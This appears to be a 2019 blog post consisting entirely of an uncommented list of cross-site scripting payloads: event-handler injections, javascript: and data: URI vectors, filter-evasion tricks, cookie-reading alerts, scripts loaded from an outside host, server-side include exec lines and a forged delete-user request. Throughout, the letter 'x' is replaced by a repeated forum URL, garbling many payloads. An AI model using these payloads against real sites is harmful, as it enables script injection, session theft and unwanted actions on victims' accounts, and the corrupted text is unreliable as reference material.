Sabtu, 15 Juni 2019

yoyoyoyoyoy

'"><svg/onload=alert(document.domain)>
"><img src=a onerror=prompt(document.domain);>
""><img src=x onerror=alert(document.domain)>

">< img src=x onerror=alert(document.cookie)>
<noscript><p title="</noscript><img src=x onerror=alert(1)>">
"><svg/onload=alert(12)>"@x.y

Level3    ' onerror="alert(document.domain);"
Level4    timer=')>alert(document.domain)<('
Level5    javascript:alert(123)
Level6    https://xss-game.appspot.com/level6/frame#data://text/javascript,alert(12345)

&lt;script&gt;alert(123)&lt;script&gt;
&lt;svg\/onload=prompt(1);
&lt;script&gt;alert("hellohttps://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/x worldss");&lt;script&gt;
javascript:alert("hellohttps://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/x worldss")
<img src="javascript:alert('XSS');">
180152668" onmouseover=alert(9320) bad="
<img src=https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/x onError=alert(‘https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xss’)>
<img src=javascript:alert("XSS")>
<img src=https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/x onError=alert(‘https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xss’)>
<"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->&lt;script&gt;">'>&lt;script&gt;alert(String.fromCharCode(88,83,83))&lt;script&gt;
<META HTTP-EQUIV="refresh"
</center>&lt;script&gt;alert(1);&lt;script&gt;<center>
</img>&lt;script&gt;alert(1)&lt;script&gt;
</foo>
>&lt;script&gt;alert(1);&lt;script&gt;
">&lt;script&gt;alert(1);&lt;script&gt;
'>&lt;script&gt;alert(1);&lt;script&gt;
&lt;script&gt;&lt;script&gt;alert(1);&lt;script&gt;&lt;script&gt;
&lt;script&gt;&lt;script&gt;alert(1);&lt;script&gt;&lt;script&gt;
'+onMouseOver='alert(1);
"+onMouseOver="alert(1);
CONTENT="0;url=data:tehttps://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xt/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<EMBED SRC="data:image/svg+https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xml;base64,PHN2ZyB4bWhttps://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWhttps://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xOTk5L3hs aW5rIiB2ZXJzaW9uPSIhttps://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIhttps://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWhttps://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xml" AllowScriptAccess="always"></EMBED>
<SCRIPT a=">" SRC="http://ha.ckers.org/https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xss.js">&lt;script&gt;
<SCRIPT a=">" '' SRC="http://ha.ckers.org/https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xss.js">&lt;script&gt;
<SCRIPT "a='>'" SRC="http://ha.ckers.org/https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xss.js">&lt;script&gt;
<SCRIPT a=">'>" SRC="http://ha.ckers.org/https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xss.js">&lt;script&gt;
&lt;script&gt;document.write("<SCRI");&lt;script&gtT SRC="http://ha.ckers.org/https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xss.js">&lt;script&gt;
<&lt;script&gt;alert("XSS");//<&lt;script&gt;
<"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->&lt;script&gt;">'>&lt;script&gt;alert(String.fromCharCode(88,83,83))&lt;script&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->&lt;script&gt;">'>&lt;script&gt;alert(String.fromCharCode(88,83,83))<?/SCRIPT>&submit.https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/x=27&submit.y=9&cmd=search
&lt;script&gt;alert("hellohttps://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/x worldss")&lt;script&gt;&safe=high&chttps://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/x=006665157904466893121:su_tzknyhttps://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xug&cof=FORID:9#510
&lt;script&gt;alert("XSS");&lt;script&gt;&search=1
0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?8String.fromCharCode(88,83,83))//";alert(String.fromCharCode?(88,83,83))//\";alert(String.fromCharCode(88,83,83)%?29//-->&lt;script&gt;">'>&lt;script&gt;alert(String.fromCharCode(88,83%?2C83))&lt;script&gt;&submit-frmGoogleWeb=Web+Search
<h1><font color=blue>hellohttps://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/x worldss</h1>
<BODY ONLOAD=alert('hellohttps://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/x worldss')>
<input onfocus=write(XSS) autofocus>
<input onblur=write(XSS) autofocus><input autofocus>
</center>&lt;script&gt;alert(1);&lt;script&gt;<center>
</img>&lt;script&gt;alert(1)&lt;script&gt;
</foo>
>&lt;script&gt;alert(1);&lt;script&gt;
">&lt;script&gt;alert(1);&lt;script&gt;
'>&lt;script&gt;alert(1);&lt;script&gt;
&lt;script&gt;&lt;script&gt;alert(1);&lt;script&gt;&lt;script&gt;
&lt;script&gt;&lt;script&gt;alert(1);&lt;script&gt;&lt;script&gt;
'+onMouseOver='alert(1);
"+onMouseOver="alert(1);
<body onscroll=alert(XSS)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
<form><button formaction="javascript:alert(XSS)">lol
<!--<img src="--><img src=https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/x onerror=alert(XSS)//">
<![><img src="]><img src=https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/x onerror=alert(XSS)//">
<style><img src="</style><img src=https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/x onerror=alert(XSS)//">
<? foo=">&lt;script&gt;alert(1)&lt;script&gt;">
<! foo=">&lt;script&gt;alert(1)&lt;script&gt;">
</ foo=">&lt;script&gt;alert(1)&lt;script&gt;">
<? foo="><https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/x foo='?>&lt;script&gt;alert(1)&lt;script&gt;'>">
<! foo="[[[Inception]]"><https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/x foo="]foo>&lt;script&gt;alert(1)&lt;script&gt;">
<% foo><https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/x foo="%>&lt;script&gt;alert(123)&lt;script&gt;">
<div style="font-family:'foo ;color:red;';">LOL
LOL<style>*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}</style>
&lt;script&gt;({0:#0=alert/#0#/#0#(0)})&lt;script&gt;
<svg https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xmlns="http://www.w3.org/2000/svg">LOL&lt;script&gt;alert(123)&lt;script&gt;</svg>
&lt;script&gt;alert(/XSS/.source)&lt;script&gt;
\\";alert('XSS');//
</TITLE>&lt;script&gt;alert(\"XSS\");&lt;script&gt;
<INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">
<BODY BACKGROUND=\"javascript:alert('XSS')\">
<BODY ONLOAD=alert('XSS')>
<IMG DYNSRC=\"javascript:alert('XSS')\">
<IMG LOWSRC=\"javascript:alert('XSS')\">
<BGSOUND SRC=\"javascript:alert('XSS');\">
<BR SIZE=\"&{alert('XSS')}\">
<LAYER SRC=\"http://ha.ckers.org/scriptlet.html\"></LAYER>
<LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">
<LINK REL=\"stylesheet\" HREF=\"http://ha.ckers.org/https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xss.css\">
<STYLE>@import'http://ha.ckers.org/https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xss.css';</STYLE>
<META HTTP-EQUIV=\"Link\" Content=\"<http://ha.ckers.org/https://foru ... /forum/xss.css>; REL=stylesheet\">
<STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xssmoz.https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xml#https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xss\")}</STYLE>
<XSS STYLE=\"behavior: url(https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xss.htc);\">
<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS
<IMG SRC='vbscript:msgbohttps://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/x(\"XSS\")'>
<IMG SRC=\"mocha:[code]\">
<IMG SRC=\"livescript:[code]\">
žscriptualert(EXSSE)ž/scriptu
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:tehttps://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xt/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\"
<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>
<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>
<TABLE BACKGROUND=\"javascript:alert('XSS')\">
<TABLE><TD BACKGROUND=\"javascript:alert('XSS')\">
<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">
<DIV STYLE=\"background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029\">
<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">
<DIV STYLE=\"width: ehttps://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xpression(alert('XSS'));\">
<STYLE>@im\port'\ja\vasc\ript:alert(\"XSS\")';</STYLE>
<IMG STYLE=\"https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xss:ehttps://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xpr/*XSS*/ession(alert('XSS'))\">
<XSS STYLE=\"https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xss:ehttps://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xpression(alert('XSS'))\">
ehttps://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xp/*<A STYLE='no\https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xss:nohttps://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xss(\"*//*\");
https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xss:ehttps://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/x/*XSS*//*/*/pression(alert(\"XSS\"))'>
<STYLE TYPE=\"tehttps://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xt/javascript\">alert('XSS');</STYLE>
<STYLE>.XSS{background-image:url(\"javascript:alert('XSS')\");}</STYLE><A CLASS=XSS></A>
<STYLE type=\"tehttps://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xt/css\">BODY{background:url(\"javascript:alert('XSS')\")}</STYLE>
<!--[if gte IE 4]>
&lt;script&gt;alert('XSS');&lt;script&gt;
<![endif]-->
<BASE HREF=\"javascript:alert('XSS');//\">
<OBJECT TYPE=\"tehttps://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xt/https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/x-scriptlet\" DATA=\"http://ha.ckers.org/scriptlet.html\"></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
<EMBED SRC=\"http://ha.ckers.org/https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xss.swf\" AllowScriptAccess=\"always\"></EMBED>
<EMBED SRC=\"data:image/svg+https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xml;base64,PHN2ZyB4bWhttps://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWhttps://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xOTk5L3hs aW5rIiB2ZXJzaW9uPSIhttps://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIhttps://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWhttps://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xml\" AllowScriptAccess=\"always\"></EMBED>
a=\"get\";
b=\"URL(\\"\";
c=\"javascript:\";
d=\"alert('XSS');\\")\";
eval(a+b+c+d);
<HTML https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xmlns:https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xss><?import namespace=\"https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xss\" implementation=\"http://ha.ckers.org/https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xss.htc\"><https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xss:https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xss>XSS</https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xss:https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xss></HTML>
<XML ID=I><X><C><![CDATA[<IMG SRC=\"javas]]><![CDATA[cript:alert('XSS');\">]]>
</C></X></https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<XML ID=\"https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xss\"><I><B><IMG SRC=\"javas<!-- -->cript:alert('XSS')\"></B></I></XML>
<SPAN DATASRC=\"#https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"></SPAN>
<XML SRC=\"https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xsstest.https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xml\" ID=I></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<HTML><BODY>
<?https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xml:namespace prefihttps://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/x=\"t\" ns=\"urn:schemas-microsoft-com:time\">
<?import namespace=\"t\" implementation=\"#default#time2\">
<t:set attributeName=\"innerHTML\" to=\"XSS<SCRIPT DEFER>alert("XSS")&lt;script&gt;\">
</BODY></HTML>
<SCRIPT SRC=\"http://ha.ckers.org/https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xss.jpg\">&lt;script&gt;
<!--#ehttps://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xec cmd=\"/bin/echo '<SCR'\"--><!--#ehttps://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xec cmd=\"/bin/echo 'IPT SRC=http://ha.ckers.org/https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xss.js>&lt;script&gt;'\"-->
<? echo('<SCR)';
echo('IPT>alert(\"XSS\")&lt;script&gt;'); ?>
<IMG SRC=\"http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\">
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
<META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=&lt;script&gt;alert('XSS')&lt;script&gt;\">
<HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"tehttps://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xt/html; charset=UTF-7\"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
<SCRIPT a=\">\" SRC=\"http://ha.ckers.org/https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xss.js\">&lt;script&gt;
<SCRIPT =\">\" SRC=\"http://ha.ckers.org/https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xss.js\">&lt;script&gt;
<SCRIPT a=\">\" '' SRC=\"http://ha.ckers.org/https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xss.js\">&lt;script&gt;
<SCRIPT \"a='>'\" SRC=\"http://ha.ckers.org/https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xss.js\">&lt;script&gt;
<SCRIPT a=`>` SRC=\"http://ha.ckers.org/https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xss.js\">&lt;script&gt;
<SCRIPT a=\">'>\" SRC=\"http://ha.ckers.org/https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xss.js\">&lt;script&gt;
&lt;script&gt;document.write(\"<SCRI\");&lt;script&gtT SRC=\"http://ha.ckers.org/https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xss.js\">&lt;script&gt;
<A HREF=\"http://66.102.7.147/\">XSS</A>
<A HREF=\"http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\">XSS</A>
<A HREF=\"http://1113982867/\">XSS</A>
<A HREF=\"http://0https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/x42.0https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/x0000066.0https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/x7.0https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/x93/\">XSS</A>
<A HREF=\"http://0102.0146.0007.00000223/\">XSS</A>
<A HREF=\"htt p://6 6.000146.0https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/x7.147/\">XSS</A>
<A HREF=\"//www.google.com/\">XSS</A>
<A HREF=\"//google\">XSS</A>
<A HREF=\"http://ha.ckers.org@google\">XSS</A>
<A HREF=\"http://google:ha.ckers.org\">XSS</A>
<A HREF=\"http://google.com/\">XSS</A>
<A HREF=\"http://www.google.com./\">XSS</A>
<A HREF=\"javascript:document.location='http://www.google.com/'\">XSS</A>

\https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/x3c
\https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/x3C
\u003c
\u003C
<iframe src=http://ha.ckers.org/scriptlet.html>
<IMG SRC=\"javascript:alert('XSS')\"
<SCRIPT SRC=//ha.ckers.org/.js>
<SCRIPT SRC=http://ha.ckers.org/https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xss.js?<B>
<&lt;script&gt;alert(\"XSS\");//<&lt;script&gt;
<SCRIPT/SRC=\"http://ha.ckers.org/https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xss.js\">&lt;script&gt;
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(\"XSS\")>
<SCRIPT/XSS SRC=\"http://ha.ckers.org/https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xss.js\">&lt;script&gt;
<IMG SRC=\"   javascript:alert('XSS');\">
perl -e 'print \"<SCR\0IPT>alert(\\"XSS\\")</SCR\0IPT>\";' > out
perl -e 'print \"<IMG SRC=java\0script:alert(\\"XSS\\")>\";' > out
<IMG SRC=\"jav ascript:alert('XSS');\">
<IMG SRC=\"jav ascript:alert('XSS');\">
<IMG SRC=\"jav ascript:alert('XSS');\">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG \"\"\">&lt;script&gt;alert(\"XSS\")&lt;script&gt;\">
<IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=\"javascript:alert('XSS');\">
<SCRIPT SRC=http://ha.ckers.org/https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xss.js>&lt;script&gt;
'';!--\"<XSS>=&{()}
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\";alert(String.fromCharCode(88,83,83))//-->&lt;script&gt;\">'>&lt;script&gt;alert(String.fromCharCode(88,83,83))&lt;script&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->&lt;script&gt;">'>&lt;script&gt;alert(String.fromCharCode(88,83,83))&lt;script&gt;
'';!--"<XSS>=&{()}
<SCRIPT SRC=http://ha.ckers.org/https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xss.js>&lt;script&gt;
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascrscriptipt:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG """>&lt;script&gt;alert("XSS")&lt;script&gt;">
<IMG SRC="   javascript:alert('XSS');">
<SCRIPT/XSS SRC="http://ha.ckers.org/https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xss.js">&lt;script&gt;
<SCRIPT/SRC="http://ha.ckers.org/https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xss.js">&lt;script&gt;
<&lt;script&gt;alert("XSS");//<&lt;script&gt;
&lt;script&gt;a=/XSS/alert(a.source)&lt;script&gt;
\";alert('XSS');//
</TITLE>&lt;script&gt;alert("XSS");&lt;script&gt;
¼script¾alert(¢XSS¢)¼/script¾
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<TABLE BACKGROUND="javascript:alert('XSS')">
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<DIV STYLE="width: ehttps://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xpression(alert('XSS'));">
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG STYLE="https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xss:ehttps://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xpr/*XSS*/ession(alert('XSS'))">
<XSS STYLE="https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xss:ehttps://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xpression(alert('XSS'))">
ehttps://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xp/*<A STYLE='no\https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xss:nohttps://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xss("*//*");https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xss:ehttps://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/x/*XSS*//*/*/pression(alert("XSS"))'>
<EMBED SRC="http://ha.ckers.org/https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xss.swf" AllowScriptAccess="always"></EMBED>
a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e);
<SCRIPT SRC="http://ha.ckers.org/https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xss.jpg">&lt;script&gt;
<HTML><BODY><?https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xml:namespace prefihttps://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/x="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")&lt;script&gt;"></BODY></HTML>
&lt;script&gt;document.write("<SCRI");&lt;script&gtT SRC="http://ha.ckers.org/https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xss.js">&lt;script&gt;
<form id="test" /><button form="test" formaction="javascript:alert(123)">TESTHTML5FORMACTION
<form><button formaction="javascript:alert(123)">crosssitespt
<frameset onload=alert(123)>
<!--<img src="--><img src=https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/x onerror=alert(123)//">
<style><img src="</style><img src=https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/x onerror=alert(123)//">
<object data="data:tehttps://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xt/html;base64,PHNjcmlwdD5hbGVydCghttps://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xKTwvc2NyaXB0Pg==">
<embed src="data:tehttps://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xt/html;base64,PHNjcmlwdD5hbGVydCghttps://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xKTwvc2NyaXB0Pg==">
<embed src="javascript:alert(1)">
